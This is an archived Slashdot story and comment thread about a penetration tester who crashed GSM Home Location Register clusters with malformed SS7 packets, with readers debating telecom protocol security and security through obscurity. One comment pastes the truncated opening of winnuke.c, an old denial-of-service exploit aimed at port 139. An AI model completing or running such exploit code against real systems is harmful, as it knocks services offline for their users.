Forgot your password?
typodupeerror
Network Security IT

Lone Packet Crashes Telco Networks 57

Posted by Soulskill
from the sharpshooting-with-information dept.
mask.of.sanity writes "A penetration tester has shown that GSM communications systems can be taken down with a handful of malformed packets. The weakness was in the lack of security around the Home Location Register server clusters which store GSM subscriber details as part of the global SS7 network. A single packet, sent from within any network including femtocells, took down one of the clusters for two minutes."
This discussion has been archived. No new comments can be posted.

Lone Packet Crashes Telco Networks

Comments Filter:
  • Hardly surprising... (Score:3, Informative)

    by jonwil (467024) on Friday October 12, 2012 @09:15AM (#41630819)

    Cellular standards like GSM and UMTS (no idea about other standards like LTE or CDMA) are not designed to be secure. They are designed to be complex to implement and to use as many pieces of patented technology as possible.

    • by Another, completely (812244) on Friday October 12, 2012 @09:23AM (#41630925)
      They do have security designed in, but it's the hard-outer-shell variety. Doesn't GSM authenticate handsets by having the home register send a challenge along with the appropriate response in a plain-text packet to the cell? The first GSM "attack" I heard about involved connecting your fake phone to a cell, and listening to the microwave channel to hear what response you should send when it sends a challenge. It doesn't sound like a clever design, but I suppose it was trying to reduce communication and memory requirements at the home register?
      • by Fnord666 (889225)

        They do have security designed in, but it's the hard-outer-shell variety.

        Isn't that the M&M security method with a hard outer shell and a soft creamy center?

    • by Severus Snape (2376318) on Friday October 12, 2012 @09:26AM (#41630975)
      You surely can't be that naive and must be trolling. GSM masts are critical pieces of infrastructure in mobile telecoms and it's in every stakeholders that they are secure and reliable. It's security researchers jobs to find these holes, if they were so poorly designed we'd see stories like this every day.
      • by queazocotal (915608) on Friday October 12, 2012 @09:39AM (#41631183)

        Well, no.

        The barrier to entry for a firefox security hole is really, really low.
        Typically anyone with a computer can do it, with no external equipment.
        In addition, it's typically legal to do. (though that may not stop some).

        Knowledge of how tcp/ip and similar standards work is widespread, and lots of people know this.

        For hacking cell networks, it's a bit different.

        It's basically a completely different set of protocol stacks unrelated to tcp/ip - so you have to learn a whole bunch to even attempt it.
        You need a few thousand dollars (this may have come down slightly) of specialised equipment to do the attack.
        You are doing something that is often illegal, or of dubious legality at best.

        All of these combine to make the pool of attackers orders of magnitude smaller.

        • by Gerald (9696) on Friday October 12, 2012 @09:48AM (#41631289) Homepage

          The barrier for GSM is getting lower every day [osmocom.org] so it wouldn't surprise me if bugs like this start showing up more often.

        • by Megane (129182) on Friday October 12, 2012 @09:52AM (#41631331) Homepage

          It's basically a completely different set of protocol stacks unrelated to tcp/ip - so you have to learn a whole bunch to even attempt it. You need a few thousand dollars (this may have come down slightly) of specialised equipment to do the attack. You are doing something that is often illegal, or of dubious legality at best.

          What you are talking about is security through obscurity, [wikipedia.org] which is of dubious security at best.

          • Re: (Score:3, Informative)

            by geekoid (135745)

            Security through obscurity is a perfectly fine layer of security.

            • by grcumb (781340) on Friday October 12, 2012 @10:23AM (#41631733) Homepage Journal

              "Security through obscurity is a perfectly fine extra layer of security."

              FTFY

              In other words: If you're relying on obscurity, you're doing it wrong.

              • by DarkOx (621550)

                No its not fine as a layer, and yes if you rely on it you are most certainly doing it wrong. While I'll agree it might be best not publish you network diagrams and similar as that might just be inviting trouble your components should not be secret.

                It can take way less time than you might be inclined to think for skilled cracker to develop a vulnerability. If they get their foot in the door anywhere, that obscure device or software component might well be their easiest path to escalated privileges. Since

          • Actually I thought he was talking about how bad the mobile networks are. The comment to which he was replying said that there are a lot of people trying to find these holes, so we'd find them all, but really there aren't that many people in a position to look for the holes, thus many will go unfound.

        • Re: (Score:3, Interesting)

          by camperdave (969942)

          You need a few thousand dollars (this may have come down slightly) of specialised equipment to do the attack.

          Specialized equipment? You can probably do it with a cheap Android cell phone and some warez.

          • by queazocotal (915608) on Friday October 12, 2012 @12:10PM (#41633125)

            In essentially all android and other phones, the 'modem' runs on a seperate processor, running its own OS, signed.
            'owning' the base android phone does nothing.
            You need to separately crack the modem. (unlocking is not cracking).
            The modem in most phones is basically a hayes-compatible modem, with a wierd interface soldered onto the board.
            The only interfaces the android side has to it is 'AT' commands.
            It can't inject raw packets, or ...

    • Cellular standards like GSM and UMTS (no idea about other standards like LTE or CDMA) are not designed to be secure. They are designed to be complex to implement and to use as many pieces of patented technology as possible.

      Not to mention they were designed in 1990, and anything above only a minimal level of security is "optional". The world (or the parts of it that still use GSM) need to move on.

    • by scamper_22 (1073470) on Friday October 12, 2012 @10:25AM (#41631757)

      Or there's a much simpler explanation... people who design protocols make tradeoffs or don't care about security.

      Most of the Internet protocols were designed in a relatively open way. Are they secure?

      Have you perhaps taken a look at SMTP, HTTP... heck even TCP isn't really secure. There's no authentication.

      Now yes, things have been built on top of things and security added on and more focused on... but really...

      In any case, just looking at history in the internet space, I think the lack of security has more to do with tradeoffs and trying to get things out quickly than any grand plan for patents.

      • by camperdave (969942) on Friday October 12, 2012 @10:52AM (#41632139) Journal
        Security is a presentation layer issue. SMTP, HTTP and TCP are not session layer protocols, and have no business worrying about security.
        • by DarkOx (621550) on Friday October 12, 2012 @12:10PM (#41633129) Journal

          Well yes and know. Authentication, Confidentiality, and forms of integrity are session or higher layer problems. Availability is also a key component of security. You can't tell me issues like ye'old LAND attack, tear drop, ping of death, negative sequence numbers etc don't cause Availability problems and they are decidedly network and transport layer. If I can cut your wire to jam your airwaves thats a physical layer issue.

        • by Anonymous Coward

          Security probably needs to exist at all layers of the OSI model.

          It is true that some forms of security, relating to user data or user transactions, apply at the higher level and thus belong up in the topmost OSI network model layers.

          On the other hand, if your lower layers are compromised, channel availability is lost or data is compromised. You can't exactly ignore that sort of security at the lower layers.

          Every layer needs enough security so as to not be easily compromised.

          Also note that the Internet was a

    • by Cyberax (705495)
      Not really. Telecom standards are an example of natural evolution of very long-living standards (consider this - phone networks predate the Internet itself!) and carry a lot of interoperability baggage. Besides, lots of modern standards were designed in 80-s and so they rely on contemporary technologies like ASN, that makes them hard to implement but is entirely understandable.
  • by Anonymous Coward

    A missing break statement was what brought down the eastern phone network in North America about 20 years ago. And the same simple problem seems to happen again.

  • by Anonymous Coward on Friday October 12, 2012 @09:25AM (#41630967)

    I was wondering why my router was playing the William Tell Overture.

  • by Anonymous Coward on Friday October 12, 2012 @09:26AM (#41630983)

    Taco Bell Fire Sauce?

  • by exabrial (818005) on Friday October 12, 2012 @09:35AM (#41631131)
    The RF portion of the standards is well designed (take LTE with orthogonal multiplexing for example). However, the systems and switching part is waaay to complex. Telco providers are buried under mountains of technical debt... Even the systems part of LTE is complex: the American implementations from Sprint and Verizon are not be compatible because they cherry picked what parts they felt like implementing.
    • Re: (Score:3, Funny)

      Thankfully there are no examples of 'inter-networking' actually working in the wild, much less crazy stuff like hardware that can connect easily to almost any of those 'inter-networked' networks through standardized interfaces and protocols, so we can cut them some slack for failing to achieve such an absurdly difficult task...

      • Re: (Score:2, Troll)

        by jonwil (467024)

        GSM, UMTS and LTE are not complex because they need to be, they are complex because a lot of entities with massive patent portfolios spent billions of dollars ensuring that they are complex (by finding ways to get as many of their patents as possible into the standards)

        • I suspect that the telco desire to resist moving intelligence to the edges of the network has something to do with it. Ye olde intertubes are not so dumb as they seem; but they are rather closer to just carrying packets and leaving the rest to consenting adults than the cell networks are.

      • by exabrial (818005)
        I think the best example of inter-networking is worldwide GSM actually. You can take a GSM phone all over Europe and roam just fine.
  • do my penetration testing with my malformed package
    • by Anonymous Coward

      Your hand accomodates about anything, doesn't it?

  • by Anonymous Coward on Friday October 12, 2012 @10:24AM (#41631747)

    When I was testing a broadband access server at my first job, I've seen a case ping with explicitly specified packet size of 0 caused a divByZeroException on the receiving end. I couldn't resist reporting this bug in person to see the reaction on the developper's face. It was priceless. =)
    Someone else had also found a TFTP packet of death, when broadcasted all boxes under test crashed.
    Now when you factor in maliciously malformed packets, it doesn't surprise me these things happen at all.

  • /* winnuke.c - (05/07/97) By _eci */ /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */

    #include
    #include
    #include
    #include
    #include
    #include
    #include

    #define dport 139 /* Attack port: 139 is what we want */

    int x, s;
    char *str = "Bye"; /* Makes no diff */
    struct sockaddr_in addr, spoofedaddr;
    struct hostent *host;

    int open_sock(int sock, char *server, int port) {
    struct sockaddr_in blah;
    struct hostent *he;

  • But this sounds more like a feature...

  • by xmas2003 (739875) * on Friday October 12, 2012 @11:46AM (#41632811) Homepage
    Us old farts will remember something similar called the Ping-O-Death! ;-) [wikipedia.org]
  • Check the Zapruder trace man, there was clearly a second packet on the grassy knoll! If you trace the first one, it came in via the ethernet port, out the USB, then back in via an SD card - which I say is impossible. Had to be a second packet.

  • When Signalling System 7 (SS7) specifications were written, there was no assumption that anyone other than a proper telco could access the network. Of course equal access provisions and telephony developments have peeled back the layers separating the user from the signalling pattern.

    Kind of how the Bell System used audio tones to control network functions until finally moving to out of band signalling.

    Their thinking at the time was that it offered a solution for sending information across the voice ne
  • Random magazine reports on talk at random conference by random pen tester dude who sez "Wow the world's telco networks are so insecure like I've hacked them heaps of times I'm pretty 1337" (I'm paraphrasing a bit but that's basically it). Well ... meh. Although, point that world's telco networks are pretty insecure, and the main limiting factor on the amount of hacking going on is just the amount of people who bother trying, is valid. Cheers.

In order to get a loan you must first prove you don't need it.

Working...